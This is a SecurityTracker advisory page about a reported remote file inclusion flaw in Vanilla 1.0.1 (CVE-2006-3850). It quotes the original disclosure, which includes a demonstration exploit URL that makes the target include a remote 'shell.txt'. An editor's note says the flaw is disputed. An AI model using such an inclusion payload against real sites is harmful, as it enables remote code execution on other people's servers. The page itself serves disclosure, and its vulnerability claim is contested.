SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Vanilla Vendors:   Lussumo
[Vulnerability Disputed] Vanilla Include File Error in 'setup/upgrader.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016568
SecurityTracker URL:  http://securitytracker.com/id/1016568
CVE Reference:   CVE-2006-3850   (Links to External Site)
Updated:  Jul 26 2006
Original Entry Date:  Jul 25 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0.1
Description:   A vulnerability was reported in Vanilla. A remote user can include and execute arbitrary code on the target system.

The 'setup/upgrader.php' script does not properly validate user-supplied input in the 'RootDirectory' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided (works if '/conf/old_settings.php' exists):

http://[target]/[path]/setup/upgrader.php?RootDirectory=http://site/shell.txt?

MFox from Iran HackerZ Security Team reported this vulnerability.

[Editor's note: This vulnerability has been disputed by several third parties. Inspection of the source code indicates that the 'RootDirectory' parameter is set to a local directory before being used in an include statement.]

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  getvanilla.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Vanilla CMS <= 1.0.1 (RootDirectory) Remote file inclusion Vuln.

Vanilla CMS <= 1.0.1 (RootDirectory) Remote file inclusion Vuln.

##########################################################################

Vendor : Vanilla CMS
Demo : http://demo.opensourcecms.com/vanilla/
Get Source : http://getvanilla.org/
Vuln type : Remote 
Risk : High

##########################################################################

Author : MFox
HomePage : Http://hackerz.ir/
Team : IHST ( Iran HackerZ Security Team )
Contact : Mfoxhacker@gmail.com

##########################################################################

----------------- - steup/upgrader.php - ----------------------

// Include the old settings file if it is present (it just contains constants)
if (file_exists($RootDirectory.'conf/old_settings.php')) {
   include($RootDirectory.'conf/old_settings.php');
   
----------------------------- - END - ------------------------------

##########################################################################

Exploit :  ( IF /conf/old_settings.php EXIST )

Http://[site]/[path]/setup/upgrader.php?RootDirectory=http://site/shell.txt?

##########################################################################

Gr33tZ :

Hessam-X - S3rv3r_Hack3r - Rs_VB - Rh_b_H  - and other IHST members ...

TnX to : D3nGer - and others that Help me ;-) ...

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC